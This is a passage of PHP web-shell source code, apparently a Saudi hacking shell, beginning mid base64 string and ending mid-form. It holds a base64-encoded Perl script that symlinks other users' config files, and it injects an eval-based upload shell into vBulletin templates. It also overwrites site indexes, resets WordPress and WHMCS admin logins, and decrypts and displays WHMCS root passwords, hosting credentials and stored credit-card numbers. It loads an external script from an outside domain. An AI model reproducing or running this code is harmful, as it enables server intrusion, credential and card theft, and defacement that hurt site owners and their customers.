50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIj
sNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs=";
 936 
 937 $write = fwrite ($f2 ,base64_decode($sml_perl));
 938 
 939 if ($write)
 940 {
 941 
 942 @chmod('sa2/perl.pl',0755);
 943 
 944 
 945 }
 946 
 947 echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
 948 }
 949 
 950 
 951 break;
 952 
 953 
 954 }
 955 /// home ///
 956 }
 957 }
 958 else
 959 {
 960 
 961 echo '
 962 The file path to symlink
 963 
 964 <br /><br />
 965 <form method="post">
 966 <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
 967 <input type="text" name="symfile" value="sa.txt" size="60"/><br /><br />
 968 <input type="submit" value="symlink" name="symlink" /> <br /><br />
 969 
 970 
 971 
 972 </form>
 973 ';
 974 
 975 
 976 $pfile = $_POST['file'];
 977 $symfile = $_POST['symfile'];
 978 $symlink = $_POST['symlink'];
 979 
 980 if ($symlink)
 981 {
 982 
 983 @symlink("$pfile","sym/$symfile");
 984 
 985 echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
 986 exit;
 987 }else {exit;}
 988 
 989 
 990 
 991 
 992 }
 993 
 994 
 995 
 996 break;
 997 
 998 
 999 
1000 //////////////////////// mysql ///////////////////////////////////////////////////////////////////////////////
1001 
1002 
1003 case 'ms':
1004 
1005 
1006 
1007 
1008 $host = $_POST['host'];
1009 $user = $_POST['user'];
1010 $pass = $_POST['pass'];
1011 $db = $_POST['db'];
1012 
1013 
1014 
1015 
1016 
1017 
1018 ////////////////// HEEEEEEEEEEEEERE  /////////////////////////////////////////////// HEEEEEEEEEEEEERE  /////////////////////////////
1019 
1020 if ($_GET['show'] == 'tb'){
1021 
1022 $host_c =  $_COOKIE['host_mysql'];
1023 $user_c =  $_COOKIE['user_mysql'];
1024 $pass_c =  $_COOKIE['pass_mysql'];
1025 $db_c   =  $_COOKIE['db_mysql'];
1026 
1027 
1028 $con = @mysql_connect($host_c,$user_c,$pass_c);
1029 $sel = @mysql_select_db($db_c);
1030 
1031 
1032 if(!$sel){ echo "mysql connect error" ; exit;}
1033 
1034 $dbname = $db_c;
1035 
1036 $pTable =  mysql_list_tables( $dbname ) ;
1037 
1038 $num = mysql_num_rows( $pTable );
1039 
1040 echo "<div class='tmp'>
1041 <table align='center' width='40%'><td> Tables </td><td> Rows </td>";
1042 
1043 for( $i = 0; $i < $num; $i++ ) {
1044 
1045 
1046     $tablename = mysql_tablename( $pTable, $i );
1047 
1048     $sq3l=mysql_query("select  * from $tablename");
1049 
1050     $c3t=mysql_num_rows($sq3l);
1051 
1052     echo "
1053 
1054     <tr>
1055 
1056 <td>
1057 <div class='dom'><a  href='$pg?sws=ms&show=cl&tb=$tablename'  />".$tablename." </a> </div>
1058 </td>
1059 
1060 
1061 <td>
1062 ".$c3t."
1063 </td>
1064 
1065 </tr>
1066 
1067     ";
1068 
1069 
1070 
1071 
1072 if ($tablename == 'template')  { $secript = 'vb'; }
1073 
1074 else if ($tablename == 'wp_post') {$secript = 'wp';}
1075 
1076 else if ($tablename == 'jos_users') {$secript = 'jm';}
1077 
1078 else if ($tablename == 'tbladmins') {$secript = 'wh';}
1079 
1080 
1081 }
1082 
1083 
1084 if ($secript == 'vb')
1085 
1086 {
1087 
1088 
1089 echo '<div class="cont">
1090 <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options vBulletin </b>
1091 <br />  <br /> <b>
1092 [ <a href="?sws=ms&op=in"> Update Index </a>]
1093 
1094 [<a href="?sws=ms&op=sh"> Inject shell</a>]
1095 
1096 [ <a href="?sws=ms&op=shm" >Show members Information</a>]
1097 ';
1098 
1099 
1100 }
1101 
1102 
1103 
1104 else if ($secript == 'wp')
1105 {
1106 
1107 
1108   echo '
1109  <div class="cont">
1110  <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options WordPress </b><div>
1111 <br />  <br /> <b>
1112 [ <a href="?sws=ms&op=awp"> Change admin </a>]
1113 
1114 [ <a href="?sws=ms&op=shwp" >Show members</a>]';
1115 
1116 
1117   }
1118 
1119 
1120 else if ($secript == 'wh'){
1121 
1122   echo '
1123  <div class="cont">
1124  <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Whmcs </b><div>
1125 <br />  <br /> <b>
1126 [ <a href="?sws=ms&op=hroot">roots</a>]
1127 [ <a href="?sws=ms&op=chost"> Clients Hosting Account </a>]
1128 [ <a href="?sws=ms&op=scard" >Cards</a>] <br /><br />
1129 [ <a href="?sws=ms&op=trak" >tickets</a>]
1130 [ <a href="?sws=ms&op=rtrak" >ticket replies</a>]
1131  [ <a href="?sws=ms&op=sh3"> Search ticket</a>]
1132 [ <a href="?sws=ms&op=cadmin"> Change admin </a>]';
1133 
1134 
1135 }
1136 else{echo '<div class="cont"> ';}
1137 
1138 
1139 /////////////// cmd ////////////////////////////////
1140  echo "<br /><br />
1141 
1142  [ <a href='?sws=ms&op=bkup'> baukup </a>]
1143  [ <a href='?sws=ms&op=css'> Inject css </a>]
1144  <br /><br />
1145 <form method='post'>
1146 <textarea rows=\"3\" name=\"sql\">Cmd sql</textarea> <br /><br />
1147 <input type=\"submit\" value=\"SQL\" name='cmd'/>
1148 </form>
1149 <br /><br />
1150 <a style=\" float: right\" href=\"?sws=ms&op=out\" >[ Logout ]</a>";
1151 
1152 if (isset($_POST['cmd']))
1153 {
1154 
1155 $sql  = $_POST['sql'];
1156 
1157 $query =@mysql_query($sql,$con) or die;
1158 
1159 if ($query){echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">CMD sql successfully </div>  </center>";} elseif(!$query) {echo "<br /><br /><center><br /><div style=\"color: red;  font-weight: bold\">CMD sql error </div>  </center>";}
1160 
1161 
1162 }
1163 
1164 exit;
1165 
1166 
1167 }
1168 
1169 ///////////////////// show cl ///////////////
1170 else if ($_GET['show'] == 'cl')
1171 
1172 {
1173 
1174 
1175 
1176 
1177 
1178     $host_c =  $_COOKIE['host_mysql'];
1179     $user_c =  $_COOKIE['user_mysql'];
1180     $pass_c =  $_COOKIE['pass_mysql'];
1181     $db_c   =  $_COOKIE['db_mysql'];
1182 
1183 
1184     $con = @mysql_connect($host_c,$user_c,$pass_c);
1185     $sel = @mysql_select_db($db_c);
1186 
1187     $tb = $_GET['tb'];
1188 
1189     $col_sws = mysql_query("SHOW COLUMNS FROM $tb");
1190 
1191     $num2 = mysql_num_rows( $col_sws );
1192     echo "<div class='tmp'> <table align='center'><td>Columns Name</td><td>Content</td>";
1193     for( $i2 = 0; $i2 < $num2; $i2++ ){
1194 
1195     $col = mysql_fetch_row($col_sws) ;
1196     $um_sws =  $col[0];
1197 
1198      echo "<tr><td>$um_sws&nbsp;</td>" ;
1199 
1200 
1201      $tit = mysql_query ("SELECT * FROM $tb" );
1202      while ($row = mysql_fetch_assoc($tit))
1203      {
1204 
1205       $cont = $row[$um_sws] ;
1206 
1207      echo "<td>$cont</td></tr>" ;
1208 
1209 
1210 }
1211 
1212 ;
1213 
1214 
1215 }
1216 
1217 
1218 
1219 
1220 exit;
1221 
1222 
1223 }
1224 
1225 
1226 
1227 
1228 
1229 
1230 
1231 
1232 
1233 if (isset($_COOKIE['host_mysql'])){
1234 
1235 if (!isset($_GET['op'])){
1236 
1237 echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
1238 
1239 
1240 exit;
1241 }
1242 
1243 
1244 }
1245 
1246 
1247 
1248 
1249 
1250 else if (!isset($_COOKIE['host_mysql']))
1251 
1252 {
1253 
1254 
1255 if (!isset($host))
1256 {
1257 
1258 
1259 echo '
1260 
1261 <div >
1262 
1263 <br /><br /><br />
1264 <pre><form method="POST">
1265 host :<input type="text" name="host" /><br />
1266 user :<input type="text" name="user" /><br />
1267 pass :<input type="text" name="pass" /><br />
1268 db   :<input type="text" name="db" /><br />
1269 <input type="submit" name="login" value="login .."   />
1270 </form></pre>';
1271 exit;}
1272 else
1273 {
1274 
1275 $host = $_POST['host'];
1276 $user = $_POST['user'];
1277 $pass = $_POST['pass'];
1278 $db = $_POST['db'];
1279 
1280 
1281 $con = @mysql_connect($host,$user,$pass) ;
1282 
1283 $sel = @mysql_select_db($db,$con);
1284 
1285 if (!$sel)
1286 {
1287 
1288 echo " MYSQL INFOTMATI NOT TREY ";
1289 
1290 
1291 }
1292 
1293 else
1294 {
1295 
1296 
1297 
1298 setcookie( "host_mysql", $host);
1299 setcookie( "user_mysql", $user);
1300 setcookie( "pass_mysql", $pass);
1301 setcookie( "db_mysql", $db);
1302 ob_end_flush();
1303 
1304 echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
1305 exit;
1306 
1307 
1308 
1309 
1310 
1311 }}}
1312 
1313 
1314 
1315 
1316 /////////////////////////////////// Options /////////////////////////////////////////
1317 
1318 if (isset($_GET['op']))
1319 {
1320 
1321 $op = $_GET['op'];
1322 
1323     $host_c =  $_COOKIE['host_mysql'];
1324     $user_c =  $_COOKIE['user_mysql'];
1325     $pass_c =  $_COOKIE['pass_mysql'];
1326     $db_c   =  $_COOKIE['db_mysql'];
1327 
1328     $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ;
1329     $sedb3 =@mysql_select_db($db_c,$con3) or die;
1330     if (!$sedb3){echo "error in mysql connect "; exit;}
1331 
1332 
1333       /////// index vb ////////
1334 
1335 if ($op == 'in')
1336 {
1337 
1338 if (!isset($index)){
1339 
1340 echo '
1341     Your index : <br /><br />
1342      <form  method="post">
1343 
1344      <textarea rows="7" name="index" cols="40"></textarea>
1345 
1346      <br /><br />
1347      <input type="submit" value="Update Index" maxlength="30" name="sql" />
1348      </form> ';
1349 }
1350 else if ($_POST['sql'])
1351 {
1352 
1353 
1354 $index =$_POST['index'];
1355 
1356 $index=str_replace("\'","'",$index);
1357 $crypt  = "{\${eval(base64_decode(\'";
1358 $crypt .= base64_encode("echo \"$index\";");
1359 $crypt .= "\'))}}{\${exit()}}</textarea>";
1360 $sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
1361 $query =@ mysql_query($sqlindex);
1362 
1363 if ($query)
1364 {
1365   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated Index successfully </div>  </center>";
1366   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1367   exit;
1368 }
1369 else if (!$query)
1370 {
1371   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated Index erorr </div>  </center>";
1372   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1373   exit;
1374 
1375 }
1376 
1377 
1378 
1379 
1380 }
1381 
1382 
1383 
1384 
1385 
1386 
1387 
1388 
1389 
1390 
1391 }
1392 /////// shelllll ///////////
1393 else if($op == 'sh')
1394 
1395 {
1396 
1397 
1398 
1399 if (!isset($_POST['ch']))
1400 {
1401 
1402 
1403 echo '
1404 <br /><br /><br />
1405 <form method="post">
1406 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
1407 <select name="ch">
1408 <option value="faq">Inject shell in faq </option>
1409 <option value="cal">Inject shell in calendar </option>
1410 <option value="sea">Inject shell in search </option>
1411 </select>
1412 <br /><br /><br />
1413 <input type="submit" name="sql" value="Inject shell"  />
1414 </form>
1415 
1416 
1417 
1418 ';
1419 
1420 } if (isset($_POST['sql'])){
1421 
1422 $ch = $_POST['ch'];
1423 $shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ;
1424 $crypt  = "{\${eval(base64_decode(\'";
1425 $crypt .= "$shell";
1426 $crypt .= "\'))}}{\${exit()}}</textarea>";
1427 
1428 
1429 
1430 
1431 if ($ch == 'faq'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";}
1432 
1433 elseif ($ch == 'cal'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'";}
1434 
1435 elseif ($ch == 'sea'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'";}
1436 
1437 
1438 $query =@ mysql_query($sqlfaq);
1439 
1440 if ($query)
1441 {
1442   echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been successfully</div>  </center>";
1443   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1444   exit;
1445 }
1446 else if (!$query)
1447 {
1448   echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been erorr !</div>  </center>";
1449   echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1450   exit;
1451 
1452 }
1453 
1454 
1455 }
1456 
1457 
1458 
1459 
1460 
1461 
1462 
1463 
1464 
1465 }
1466 else if ($op == 'shm')
1467 {
1468 
1469 
1470 
1471 
1472 
1473 $sql = 'select * from `user`';
1474 $query =@ mysql_query($sql);
1475 
1476 if ($query)
1477 {
1478 
1479 while ($row = mysql_fetch_assoc($query))
1480 {
1481 
1482 echo "
1483 <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
1484 <tr>
1485        <td>ID :</td>
1486        <td>user :</td>
1487        <td>pass :</td>
1488        <td>salt :</td>
1489        <td>email :</td>
1490 
1491 </tr>
1492 
1493 <tr>
1494        <td>".$row['userid']."</td>
1495        <td>".$row['username']."</td>
1496        <td>".$row['password']."</td>
1497         <td>".$row['salt']."</td>
1498         <td>".$row['email']."</td>
1499 </tr>
1500 
1501 </table>
1502 
1503   ";
1504 
1505 
1506 
1507 
1508 
1509  }}
1510 
1511 }
1512 else if ($op == 'out')
1513 {
1514 
1515 setcookie( "host_mysql", $host,time()-3600);
1516 setcookie( "user_mysql", $user,time()-3600);
1517 setcookie( "pass_mysql", $pass,time()-3600);
1518 setcookie( "db_mysql", $db,time()-3600);
1519 ob_end_flush();
1520 
1521 
1522 echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms\" /> ";
1523 exit;
1524 
1525 
1526 
1527 }
1528 
1529 ///////////////////////////////// whmcs ////////////////////////////////////////
1530 
1531 
1532 else if ($op == 'hroot')
1533 {
1534 
1535 
1536 
1537 
1538 
1539 
1540 if (isset($_POST['viw']))
1541 {
1542 
1543 $hash = $_POST['hash'] ;
1544 
1545 
1546 $query = mysql_query("SELECT * FROM tblservers");
1547 
1548         echo "<div class='tmp'><table cellpadding='5' align='center'>
1549         hosting roots
1550         <tr><td>Type</td><td>noc</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
1551 
1552         while($row = mysql_fetch_array($query)) {
1553 
1554         echo "<tr>
1555         <td>{$row['type']}</td><td>{$row['noc']}</td><td>{$row['active']}</td><td>{$row['ipaddress']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
1556 
1557         </tr>";
1558         }
1559         echo "</table>";
1560 
1561 
1562         $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or 'admin' or 'administrator'");
1563          echo "<table cellpadding='5' align='center'>
1564          <br /><br />
1565          Clients roots
1566         <tr><td>IP Address</td><td>username</td><td>Password</td></tr>";
1567 
1568         while($row = mysql_fetch_array($query)) {
1569 
1570         echo "<tr>
1571         <td>{$row['dedicatedip']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
1572 
1573         </tr>";
1574         }
1575         echo "</table></div>";
1576         echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1577         exit;
1578 
1579 
1580 }
1581 else
1582 {
1583 
1584 echo'<form method="post">
1585  <br /><br />
1586 encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
1587 <input type="submit" name="viw" value="show"  />
1588 
1589 </form>';
1590 exit;
1591 
1592 
1593 
1594 
1595 
1596 }
1597 
1598 
1599 }
1600 
1601 
1602 //////////// domine ////////////
1603 
1604  else if ($op == 'scard')
1605 
1606 {
1607 
1608 if (isset($_POST['viw']))
1609 {
1610 
1611 $hash = $_POST['hash'] ;
1612 
1613 
1614 $query = mysql_query('select * from `tblclients`') ;
1615 echo "<div class='tmp'><table cellpadding='5' align='center'> ";
1616 while($v = mysql_fetch_array($query)) {
1617   echo "
1618   <tr><td>cardtype</td>
1619   <td>id</td>
1620   <td>firstname</td>
1621   <td>lastname</td>
1622   <td>email</td>
1623   <td>city</td>
1624   <td>ciuntry</td>
1625   <td>address1</td>
1626   <td>lastlogin</td>
1627   <td>phonenumber</td>
1628   <td>datecreated</td>
1629   <td>cardnum</td>
1630   <td>startdate</td>
1631   <td>expdate</td>
1632   </tr>";
1633     echo "<tr>
1634 
1635     <td>{$v['cardtype']}</td>
1636     <td>{$v['id']}</td>
1637     <td>{$v['firstname']}</td>
1638     <td>{$v['lastname']}</td>
1639     <td>{$v['email']}</td>
1640     <td>{$v['city']}</td>
1641     <td>{$v['ciuntry']}</td>
1642     <td>{$v['address1']}</td>
1643     <td>{$v['lastlogin']}</td>
1644     <td>{$v['phonenumber']}</td>
1645     <td>{$v['datecreated']}</td>
1646     <td>".decrypt ($v['cardnum'], $hash)."</td>
1647     <td>".decrypt ($v['startdate'], $hash)."</td>
1648     <td>".decrypt ($v['expdate'], $hash)."</td>
1649      </tr></div></table>";
1650      echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1651      exit;
1652 
1653  }
1654 }else
1655 {
1656 
1657 echo'<form method="post">
1658  <br /><br />
1659 encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
1660 <input type="submit" name="viw" value="show"  />
1661 
1662 </form>';
1663 exit;
1664 
1665 
1666 
1667 
1668 
1669 }
1670 
1671 
1672 
1673 
1674 
1675 
1676 
1677 }
1678 
1679  else if ($op == 'chost')
1680 
1681 {
1682 
1683 
1684 
1685 if (isset($_POST['viw']))
1686 {
1687 
1688 $hash = $_POST['hash'] ;
1689 
1690 $query = mysql_query("SELECT * FROM tblhosting");
1691     echo "<div class='tmp'><table cellpadding='5' align='center'>
1692     <tr><td>domain</td><td>Username</td><td>Pass</td><td>IP Address</td></tr>";
1693     while($r = mysql_fetch_array($query)) {
1694     echo "<tr><td>{$r['domain']}</td><td>{$r['username']}</td>
1695     <td>".decrypt ($r['password'], $hash)."</td><td>{$r['dedicatedip']}</td></tr>";
1696     }
1697     echo "</table></div>";
1698    echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1699 
1700     exit;
1701 
1702 
1703 
1704 }
1705 else
1706 {
1707 
1708 echo'<form method="post">
1709  <br /><br />
1710 encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
1711 <input type="submit" name="viw" value="show"  />
1712 
1713 </form>';
1714 exit;
1715 
1716 
1717 
1718 
1719 
1720 }
1721 
1722 
1723 
1724 
1725 
1726 
1727 
1728 }
1729 
1730 
1731 
1732 else if ($op == 'cadmin')
1733 
1734 {
1735 
1736 
1737 
1738 if (isset($_POST['viw']))
1739 {
1740 
1741 $pass = md5($_POST['pass']);
1742 $user = $_POST['user'];
1743 
1744 
1745 
1746 $query =@mysql_query("UPDATE `tbladmins` SET `username` ='".$user."' WHERE ID = 1");
1747 $query =@mysql_query("UPDATE `tbladmins` SET `password` ='".$pass."' WHERE ID = 1");
1748 
1749 if ($query)
1750 {
1751   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated admin successfully </div>  </center>";
1752           echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1753 
1754   exit;
1755 }
1756 
1757 else if (!$query)
1758 {
1759   echo "<center><br /><div style=\"color: red;  font-weight: bold\">Updated admin erorr </div>  </center>";
1760           echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1761 
1762   exit;
1763 
1764 }
1765 
1766 
1767 
1768 
1769 
1770 
1771 
1772 }
1773 else
1774 {
1775 
1776 echo'<form method="post">
1777  <br /><br />
1778 user : <input type="text" name="user" /><br /><br />
1779 pass : <input type="text" name="pass" /><br /><br />
1780 <input type="submit" name="viw" value="update"  />
1781 
1782 </form>';
1783 
1784 
1785 exit;
1786 
1787 
1788 
1789 
1790 
1791 }
1792 }
1793 
1794 
1795 
1796 else if ($op == 'trak')
1797 
1798 {
1799 
1800 $page = $_GET['page'];
1801 $numpr = 30;
1802 if(!$page){$page = 0;}
1803 $sql0 = mysql_query("Select * from tbltickets");
1804 $num_r0s = mysql_num_rows($sql0);
1805 
1806 
1807 $sql = mysql_query("Select * from tbltickets order by id desc limit $page,$numpr");
1808 
1809 $ap = 1;
1810 echo "<br /><br /><div>Page  : ";
1811 for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
1812 {
1813 
1814 if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1815 else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1816 
1817 
1818 $ap ++;
1819 
1820 }
1821 
1822 echo "</div><br />";
1823 
1824 
1825 while ($r3o = mysql_fetch_assoc($sql))
1826 {
1827 
1828 $email   = $r3o['email'];
1829 $date    = $r3o['date'];
1830 $title   = $r3o['title'];
1831 $message = $r3o['message'];
1832 echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
1833 
1834 echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
1835 <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
1836 echo "</table></div>";
1837 echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1838 exit;
1839 
1840 
1841 
1842 }
1843 
1844 }
1845 
1846 
1847 else if ($op == 'rtrak')
1848 
1849 {
1850 
1851 $page = $_GET['page'];
1852 $numpr = 25;
1853 if(!$page){$page = 0;}
1854 $sql0 = mysql_query("Select * from tblticketreplies");
1855 $num_r0s = mysql_num_rows($sql0);
1856 
1857 
1858 $sql = mysql_query("Select * from tblticketreplies order by id desc limit $page,$numpr");
1859 
1860 $ap = 1;
1861 echo "<br /><br /><div>Page  : ";
1862 for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
1863 {
1864 
1865 if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1866 else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1867 
1868 
1869 $ap ++;
1870 
1871 }
1872 
1873 echo "</div><br />";
1874 
1875 
1876 while ($r3o = mysql_fetch_assoc($sql))
1877 {
1878 
1879 $email   = $r3o['email'];
1880 $date    = $r3o['date'];
1881 $message = $r3o['message'];
1882 echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
1883 
1884 echo "<tr><td>email : $email </td><td>date : $date </td></tr>
1885 <tr > <td>message</td> <td colspan='2'>$message</td><br /><br /></tr>";
1886 echo "</table></div>";
1887 echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1888 exit;
1889 
1890 
1891 
1892 }
1893 
1894 }
1895 
1896 
1897 /////////////////////////////////// backup //////////////////////////
1898 
1899 else if ($op == 'bkup')
1900 {
1901 
1902 
1903 
1904 
1905 
1906 
1907 if (isset($_POST['viw']))
1908 {
1909 
1910 
1911 
1912 $path = $_POST['path'];
1913 
1914 $domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c);
1915 
1916 
1917   echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Create backup successfully <br /><br /> $path</div>  </center>";
1918   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1919   exit;
1920 
1921 
1922 
1923 
1924 
1925 
1926 }
1927 else
1928 {
1929 
1930 echo'<form method="post">
